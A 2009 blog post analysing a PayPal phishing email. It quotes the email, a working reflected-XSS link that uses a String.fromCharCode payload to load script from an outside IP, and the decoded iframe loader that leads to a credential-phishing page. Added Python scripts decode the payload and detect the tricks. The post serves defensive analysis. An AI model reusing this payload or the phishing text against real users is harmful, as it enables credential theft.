Wednesday, March 25, 2009

Analysis of a Real World Phishing Scheme


I received a lot of positive feedback on my blog post “Analysis of a Real World Hacking Attempt”, so after a recent email tried to direct me to a PayPal phishing site, I decided it was again time to give a little insight into the latest phishing schemes out there...

The email read something like this:

Information about your account:
Security Center

Attention! Your PayPal account was limited!

As part of our security measures, we regularly check the work of the screen PayPal. We have requested information from you for the following reason:

Our system has detected unusual charges to a credit card linked to your PayPal account.

Reference Number: PP-259-187-991

This is the last reminder to log into PayPal, as soon as possible. Once you connect. PayPal will provide measures to restore access to your account.

Once connected, follow the steps to activate your account. We appreciate your understanding as we work to ensure security.

Clik Here To Activate

We appreciate your attention to this issue. Please understand that this is a security measure designed to protect you and your account. We apologize for any inconvenience ..

Department review PayPal accounts
________________________________________
Copyright © 1999-2009 PayPal. All rights reserved.
PayPal FSA Register Number: 226056.

Yes, they actually misspelled “click” on the phishing link, along with other typos such as a double period.

The link’s target location was:
https://secure.instantssl.com/products/passwordResetRequest?orderNumber="><image src="" onerror="javascript:document.write(String.fromCharCode(60,83,67,82,73,80,84,32,83,82,67,61,34,104,116,116,112,58,47,47,57,54,46,57,46,50,52,46,49,51,48,47,120,115,115,49,46,106,112,103,34,62,60,47,83,67,82,73,80,84,62))" />

This is a textbook reflected XSS flaw: the orderNumber parameter is echoed straight back into the page, so closing the attribute is all it takes, as easily seen by requesting:
https://secure.instantssl.com/products/passwordResetRequest?orderNumber="> [XSS HERE]
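As an added example (not part of the original post), the script below decodes the String.fromCharCode() payload hidden in the link target above and contrasts the vulnerable reflection of the orderNumber parameter with an HTML-escaped one. The `<input>` element the parameter is reflected into is my assumption; the real page's markup is not known from the post, but the attribute-breakout pattern is the same in any attribute context.

```python
"""Decode the obfuscated phishing link and show the reflection flaw beside its fix.

Added example, not code from the original post.
"""
from __future__ import annotations

import html
import re
from urllib.parse import parse_qs

# The link target quoted in the post, with the line-wrap spaces removed.
PHISHING_LINK = (
    'https://secure.instantssl.com/products/passwordResetRequest?orderNumber='
    '"><image src="" onerror="javascript:document.write(String.fromCharCode('
    '60,83,67,82,73,80,84,32,83,82,67,61,34,104,116,116,112,58,47,47,57,54,46,'
    '57,46,50,52,46,49,51,48,47,120,115,115,49,46,106,112,103,34,62,60,47,83,'
    '67,82,73,80,84,62))" />'
)

# Matches the numeric argument list of every String.fromCharCode(...) call.
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")


def decode_fromcharcode(text: str) -> list[str]:
    """Return each String.fromCharCode(...) call in `text` decoded to plain text."""
    decoded = []
    for match in CHARCODE_RE.finditer(text):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def order_number_param(url: str) -> str:
    """Extract the raw orderNumber value exactly as the flawed page received it."""
    query = url.partition("?")[2]
    return parse_qs(query, keep_blank_values=True)["orderNumber"][0]


def render_vulnerable(order_number: str) -> str:
    """The flaw: the parameter is pasted into an attribute with no encoding.

    The <input> element is a hypothetical stand-in for the real page's markup.
    """
    return f'<input type="text" name="orderNumber" value="{order_number}">'


def render_safe(order_number: str) -> str:
    """The fix: HTML-escape the value (quotes included) before placing it in
    a quoted attribute, so '"><image ...' can no longer close the attribute."""
    escaped = html.escape(order_number, quote=True)
    return f'<input type="text" name="orderNumber" value="{escaped}">'


def has_injected_tag(rendered: str) -> bool:
    """Crude check: a single <input> fragment should contain exactly one tag."""
    return len(re.findall(r"<[a-zA-Z]", rendered)) > 1


if __name__ == "__main__":
    print("decoded payload:", decode_fromcharcode(PHISHING_LINK))
    value = order_number_param(PHISHING_LINK)
    print("vulnerable breaks out:", has_injected_tag(render_vulnerable(value)))
    print("escaped breaks out:   ", has_injected_tag(render_safe(value)))
```

The decoded payload is a plain `<SCRIPT SRC="http://96.9.24.130/xss1.jpg"></SCRIPT>` tag, which is why the "image" fetched next is really JavaScript. Escaping alone is the minimum fix for an attribute context; the attribute must also be quoted, since an unquoted attribute can be terminated with a space that html.escape leaves untouched.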

If you look at http://96.9.24.130/xss1.jpg, it is actually an HTML file, not a JPEG image.

Its contents are:
<html>
<body>
<img src="http://96.9.24.130/xss1.jpg" alt="http://96.9.24.130/xss1.jpg"/>
</body>
</html>

Firefox even treats it as an image providing right click options over it such as “copy image” and “copy image location”, despite it being a script target in an image tag.

Tricky... and if you save it locally and open it, you can see that xss1.jpg’s real contents are:
document.write("<iframe src='http://transgalaxyproducts.com/bbnse/webscr/webscr.php?cmd=_login-run' width='100%' height='100%' frameborder=0 scrolling=0></iframe>");

So http://transgalaxyproducts.com/bbnse/webscr/webscr.php?cmd=_login-run is actually the location of the PayPal phishing site...

That was the story as of March 3rd...

Today, March 24th, the code behind the xss1.jpg “image” has changed, as seen below:

C:\>nc 96.9.24.130 80
GET /xss1.jpg HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 25 Mar 2009 00:58:00 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_
auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 07 Mar 2009 10:22:10 GMT
ETag: "6a00c7-8c-46484c62ad880"
Accept-Ranges: bytes
Content-Length: 140
Connection: close
Content-Type: image/jpeg

document.write("<iframe src='http://96.9.24.130/cls/ws-cgi/365236545.html' width
='100%' height='100%' frameborder=0 scrolling=0></iframe>");
C:\>
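Both the March 3rd and March 24th versions of xss1.jpg share the same tell: a body that is JavaScript served under Content-Type: image/jpeg, and a document.write() that frames the next hop. The following is an added example (not from the original post) of the check a proxy, sandbox or analyst script can run on a raw HTTP response: compare the declared type against the body's magic bytes, verify Content-Length, and pull out iframe/script targets so the redirect chain can be recorded. The sample response is constructed from the netcat session above with CRLF line endings; the Server header is shortened.

```python
"""Flag a response whose body does not match its declared Content-Type and
extract the next hop from it.

Added example, not code from the original post.
"""
from __future__ import annotations

import re

# Constructed sample modelled on the netcat session in the post.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Wed, 25 Mar 2009 00:58:00 GMT\r\n"
    b"Server: Apache/2.2.10 (Unix)\r\n"
    b"Content-Length: 140\r\n"
    b"Connection: close\r\n"
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
    b"document.write(\"<iframe src='http://96.9.24.130/cls/ws-cgi/365236545.html' "
    b"width='100%' height='100%' frameborder=0 scrolling=0></iframe>\");"
)

# Leading bytes a genuine file of each declared type must start with.
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}

# src= of any <iframe> or <script> tag, single- or double-quoted.
SRC_RE = re.compile(
    r"""<(?:iframe|script)\b[^>]*\bsrc\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE
)


def split_response(raw: bytes) -> tuple[dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into lower-cased headers and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")[1:]  # drop the status line
    headers: dict[str, str] = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def content_type_mismatch(headers: dict[str, str], body: bytes) -> bool:
    """True when the declared type is one we know and the body lacks its magic."""
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    magics = MAGIC.get(declared)
    if magics is None:
        return False  # unknown type: nothing to compare against
    return not any(body.startswith(m) for m in magics)


def embedded_targets(body: bytes) -> list[str]:
    """URLs loaded by iframe/script tags found in the body, in order."""
    return SRC_RE.findall(body.decode("utf-8", errors="replace"))


def triage(raw: bytes) -> dict:
    """Summarise what an analyst wants to know about one fetched resource."""
    headers, body = split_response(raw)
    declared_len = headers.get("content-length")
    return {
        "declared_type": headers.get("content-type"),
        "mismatch": content_type_mismatch(headers, body),
        "length_ok": declared_len is None or declared_len == str(len(body)),
        "next_hops": embedded_targets(body),
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_RESPONSE).items():
        print(f"{key}: {val}")
```

Browsers of the time ran anything a `<script src>` pointed at regardless of Content-Type, so the mismatch is invisible to the victim; it is only a signal for whoever inspects the traffic. Following the extracted next_hops recursively, with the same check applied at each step, reconstructs the full chain from the instantssl.com redirector to the phishing page.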

The page at http://96.9.24.130/cls/ws-cgi/365236545.html seems to be a Craigslist listing for a truck in Atlanta, saved locally to the server. Odd, and I have no guesses as to why this would be there... your guess is as good as mine, but that’s the reality of the stuff that is going on out there.

Hopefully this gave a little insight into some of the subtle tricks hackers are using to try to steal your information.

The IP 96.9.24.130 is in a block owned by Register.com out of New York and has an HTTP banner of "Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635".

Why there is a mirror of a Craigslist page is beyond me, but that’s where I’ll leave you to wonder on your own...

2 comments:

Matt Davis said...

I think bad spelling and grammar is one of the easiest ways to spot a phishing attack. When are those phishers going to wise up and start hiring technical writers?? :) Then again, they need cultural help too. Thanks to spammers, I now know that a barrister is basically a lawyer in the UK. Silly phishers!

Alex Hamerstone said...

They are getting slowly better as far as grammar and spelling go... I have had some phishing e-mails recently that had zero spelling errors- I only knew they were phishing emails b/c they were from a bank I don't use...
Yup, the Barrister- Main difference is that in the U.S. attorneys act as both barrister and solicitor, where in the U.K. they are separate occupations...